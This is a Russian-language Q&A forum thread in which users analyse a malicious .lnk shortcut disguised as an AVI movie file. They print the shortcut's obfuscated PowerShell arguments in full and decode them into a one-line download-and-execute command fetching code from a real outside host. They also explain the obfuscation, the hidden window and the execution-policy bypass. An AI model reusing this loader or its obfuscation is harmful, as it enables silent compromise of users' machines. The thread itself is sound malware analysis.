Вредоносное ПО Использование файла .Lnk для Powershell - PullRequest
Новая
       21

Вредоносное ПО Использование файла .Lnk для Powershell

0 голосов
/ 03 ноября 2018

Я скачал файл, о котором почти не подумал дважды, но цель (ярлыка) привлекла мое внимание: 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]

Нет сомнений, что здесь происходит что-то подозрительное. Я понимаю первые три параметра, но что я не могу понять, так это то, как код полезной нагрузки, подобный этому, будет работать в простом ярлыке?

Ответы [ 2 ]

0 голосов
/ 18 ноября 2018

Я получил то же самое. Файл выглядел как AVI, и я быстро открыл его, чтобы проверить качество фильма. Это был на самом деле хорошо замаскированный ярлык: 

PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target

FullName         : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments        : -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
                   112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
                   101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
                   111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
                   ,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description      : .avi
Hotkey           :
IconLocation     : C:\WINDOWS\System32\imageres.dll,18
RelativePath     :
TargetPath       : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle      : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

Цель здесь переводится как: 

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

Я открыл http://zvb.us/1 и, похоже, на моем компьютере был запущен какой-то код. На данный момент, я не уверен, что случилось. Нет симптомов ...

0 голосов
/ 03 ноября 2018

Полагаю, он запускает Powershell с

  • NoProfile
  • WindowStyle 1 = свернутый
  • ExecutionPolicy ByPass = Ничто не заблокировано, и нет предупреждений или подсказок
  • затем точка-источник оставшегося кода

Давайте разделим этот код на: 

( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]

$ShellId - это встроенная переменная Powershell: 

  >$ShellId
  Microsoft.PowerShell

То есть ( $shelliD[1]+$SHeLlID[13]+'x') преобразуется в iex (= Invoke-Expression)

Остальной код ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. Я предполагаю, что массив char содержит символы ascii. Если это так, мы можем преобразовать его в: 

$aspx =

Резюме: 

powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."

Таким образом, он вызывает код, начинающийся с $aspx =, в свернутом окне Powershell без предупреждений или подсказок.

Может быть, код прошел через один из этих методов запутывания .

Надеюсь, это поможет.

...